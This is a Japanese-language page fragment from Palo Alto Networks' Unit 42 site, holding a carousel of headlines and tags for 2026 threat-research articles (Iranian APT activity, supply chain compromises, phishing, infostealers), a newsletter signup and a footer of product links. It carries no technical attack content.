  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/) 2026年5月22日 [#### イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/)

* [Advanced Persistent Threat](https://unit42.paloaltonetworks.com/ja/tag/advanced-persistent-threat-ja/ "Advanced Persistent Threat")

* [AppDomainManager](https://unit42.paloaltonetworks.com/ja/tag/appdomainmanager/ "AppDomainManager")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/ "イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡")  
  ![Pictorial representation of Iran cyber attacks. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/12_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月17日 [#### 脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/)

* [APK](https://unit42.paloaltonetworks.com/ja/tag/apk-ja/ "APK")

* [DDoS attacks](https://unit42.paloaltonetworks.com/ja/tag/ddos-attacks-ja/ "DDoS attacks")

* [GenAI](https://unit42.paloaltonetworks.com/ja/tag/genai-ja/ "GenAI")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/ "脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)")  
  ![Pictorial representation of the supply chain attack compromising Axios. A giant eye made of glowing binary code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/02_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月1日 [#### 脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/)

* [API attacks](https://unit42.paloaltonetworks.com/ja/tag/api-attacks-ja/ "API attacks")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")

* [Powershell](https://unit42.paloaltonetworks.com/ja/tag/powershell-ja/ "Powershell")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/ "脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響")  
  ![Pictorial representation of TeamPCP. Glowing code on a screen where several word such as Crime, Hackers, and Security are highlighted in a contrasting color.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/03_Cybercrime_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年3月31日 [#### プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/)

* [CVE-2025-55182](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-55182-ja/ "CVE-2025-55182")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/ "プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃")  
  ![Pictorial representation of phishing campaign. A blurred image focusing on a person typing on a laptop with lines of code visible on the screen, illuminated in blue and red lights, suggestive of intense coding or cyber activities.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/06_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年3月24日 [#### 脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/)

* [Email scam](https://unit42.paloaltonetworks.com/ja/tag/email-scam/ "email scam")

* [Lure](https://unit42.paloaltonetworks.com/ja/tag/lure/ "lure")

* [Phishing](https://unit42.paloaltonetworks.com/ja/tag/phishing-ja/ "phishing")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/ "脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム")  
  ![Pictorial representation of Notepad++ supply chain compromise. A digital rendering of Earth from space, focusing on North and South America. The continents are illuminated in blue, with red lines and dots indicating data connections across various locations. Dark background highlights the vibrant network representation.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/11_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年2月11日 [#### 国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/)

* [Backdoor](https://unit42.paloaltonetworks.com/ja/tag/backdoor-ja/ "backdoor")

* [Cobalt Strike](https://unit42.paloaltonetworks.com/ja/tag/cobalt-strike-ja/ "Cobalt Strike")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/ "国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用")  
  ![Pictorial representation of runtime assembly attacks. Digital artwork of a glowing, futuristic shield disintegrating into small particles, set against a dark blue, bokeh-effect background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/09_Business_email_compromise_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月22日 [#### ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/)

* [API](https://unit42.paloaltonetworks.com/ja/tag/api-ja/ "API")

* [Google](https://unit42.paloaltonetworks.com/ja/tag/google-ja/ "Google")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/ "ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成")  
  ![Pictorial representation of SLOW#TEMPEST campaign. Digital artwork depicting a malware alert symbol on a computer screen, with background of blurred programming code in blue and red colors.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/07_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月2日 [#### Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer](https://unit42.paloaltonetworks.com/ja/vvs-stealer/)

* [Discord](https://unit42.paloaltonetworks.com/ja/tag/discord/ "Discord")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")

* [Python](https://unit42.paloaltonetworks.com/ja/tag/python-ja/ "Python")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/vvs-stealer/ "Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/04/Unit-42_get-updates-banner.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Unit 42 からの最新情報を取得

## 進化する脅威の状況を常に先取り

メール アドレス

本フォームを送信することにより、[利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)に同意し、[プライバシー ポリシー](https://www.paloaltonetworks.jp/legal-notices/privacy)を承認したことになります。

本サイトは reCAPTCHA で保護されており、Googleの[プライバシー ポリシー](https://policies.google.com/privacy) と[サービス利用規約](https://policies.google.com/terms)が適用されます。

Invalid captcha!
サブスクライブ ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} 製品とサービス

* [AI利用ネットワーク セキュリティ プラットフォーム](https://www.paloaltonetworks.jp/network-security)

* [AIのセキュア バイ デザイン](https://www.paloaltonetworks.jp/precision-ai-security/secure-ai-by-design)

* [Prisma AIRS](https://www.paloaltonetworks.jp/prisma/prisma-ai-runtime-security)

* [AI Access Security](https://www.paloaltonetworks.jp/sase/ai-access-security)

* [クラウド提供型セキュリティ サービス](https://www.paloaltonetworks.jp/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.jp/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.jp/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.jp/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.jp/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/enterprise-iot-security)

* [Medical IoT Security](https://www.paloaltonetworks.jp/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/industrial-ot-security)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)

* [ハードウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/hardware-firewall-innovations)

* [ソフトウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.jp/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.jp/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.jp/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.jp/network-security/panorama)

* [セキュア アクセス サービス エッジ](https://www.paloaltonetworks.jp/sase)

* [Prisma SASE](https://www.paloaltonetworks.jp/sase)

* [App Acceleration](https://www.paloaltonetworks.jp/sase/app-acceleration)

* [自律型デジタルエクスペリエンス管理](https://www.paloaltonetworks.jp/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.jp/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.jp/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.jp/sase/sd-wan)

* [リモート ブラウザ分離](https://www.paloaltonetworks.jp/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [AI駆動型セキュリティ運用プラットフォーム](https://www.paloaltonetworks.jp/cortex)

* [Cloud Security](https://www.paloaltonetworks.jp/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.jp/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.jp/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.jp/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.jp/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.jp/prisma/cloud)

* [AI駆動型SOC](https://www.paloaltonetworks.jp/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.jp/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.jp/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.jp/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.jp/cortex/cortex-xpanse)

* [Unit 42マネージド ディテクション\&レスポンス](https://www.paloaltonetworks.jp/cortex/managed-detection-and-response)

* [マネージドXSIAM](https://www.paloaltonetworks.jp/cortex/managed-xsiam)

* [次世代のアイデンティティ セキュリティ](https://www.paloaltonetworks.jp/idira)

* [特権アクセス管理](https://www.paloaltonetworks.jp/idira/human/privileged-access-management)

* [アイデンティティ管理とアクセス管理](https://www.paloaltonetworks.jp/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.jp/idira/human/endpoint-privilege-manager)

* [アイデンティティ ガバナンス](https://www.paloaltonetworks.jp/idira/human/identity-governance)

* [従業員パスワード管理](https://www.paloaltonetworks.jp/idira/human/workforce-password-management)

* [エージェンティック アイデンティティ](https://www.paloaltonetworks.jp/idira/agentic)

* [シークレット管理](https://www.paloaltonetworks.jp/idira/machine/secrets-management)

* [統合型シークレット ガバナンス](https://www.paloaltonetworks.jp/idira/machine/unified-secrets-governance)

* [アプリケーションの認証情報配信](https://www.paloaltonetworks.jp/idira/machine/application-credentials-delivery)

* [ベンダーの特権アクセス](https://www.paloaltonetworks.jp/idira/human/vendor-privileged-access)

* [脅威インテリジェンス\&インシデント レスポンス サービス](https://www.paloaltonetworks.jp/unit42)

* [予防評価](https://www.paloaltonetworks.jp/unit42/assess)

* [インシデント レスポンス](https://www.paloaltonetworks.jp/unit42/respond)

* [セキュリティ戦略を変革](https://www.paloaltonetworks.jp/unit42/transform)

* [脅威インテリジェンスについて](https://www.paloaltonetworks.jp/unit42/threat-intelligence-partners)  
  会社名

* [パロアルトネットワークスについて](https://www.paloaltonetworks.jp/about-us)

* [採用情報](https://jobs.paloaltonetworks.com/en/)

* [お問合せ](https://www.paloaltonetworks.jp/company/contact-sales)

* [企業責任](https://www.paloaltonetworks.com/about-us/corporate-responsibility)

* [お客様向け](https://www.paloaltonetworks.jp/customers)

* [IR](https://investors.paloaltonetworks.com/)

* [拠点](https://www.paloaltonetworks.com/about-us/locations)

* [ニュースルーム](https://www.paloaltonetworks.jp/company/newsroom)  
  人気のあるリンク

* [ブログ](https://www.paloaltonetworks.com/blog/?lang=ja)

* [コミュニティ](https://www.paloaltonetworks.com/communities)

* [コンテンツライブラリ](https://www.paloaltonetworks.jp/resources)

* [Cyberpedia](https://www.paloaltonetworks.jp/cyberpedia)

* [イベントセンター](https://events.paloaltonetworks.com/)

* [電子メール設定の管理](https://start.paloaltonetworks.com/preference-center)

* [製品A〜Z](https://www.paloaltonetworks.jp/products/products-a-z)

* [製品認証](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance)

* [脆弱性の報告](https://www.paloaltonetworks.com/security-disclosure)

* [サイトマップ](https://www.paloaltonetworks.jp/sitemap)

* [テクニカル ドキュメント](https://docs.paloaltonetworks.com/)

* [Unit 42](https://unit42.paloaltonetworks.jp/)

* [個人情報の販売および共有禁止](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![Palo Alto Networks Logo](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/pan-logo-dark.svg)

* [プライバシー](https://www.paloaltonetworks.jp/legal-notices/privacy)

* [トラスト センター](https://www.paloaltonetworks.jp/legal-notices/trust-center)

* [利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)

* [ドキュメント](https://www.paloaltonetworks.jp/legal-notices)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![](https://www.paloaltonetworks.jp/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![](https://www.paloaltonetworks.jp/content/dam/pan/en_US/images/icons/podcast.svg)](https://unit42.paloaltonetworks.com/unit-42-threat-vector-podcast/)
* JP  
  Select your language  
  ![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg) ![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg) ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg)

### Default Heading

Read the article ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg)  
Seekbar

![Play](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-play-icon.svg) ![Pause](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/player-pause-icon1.svg)  
![Volume](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-volume.svg)  
Volume
![Minimize](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-minimize.svg)
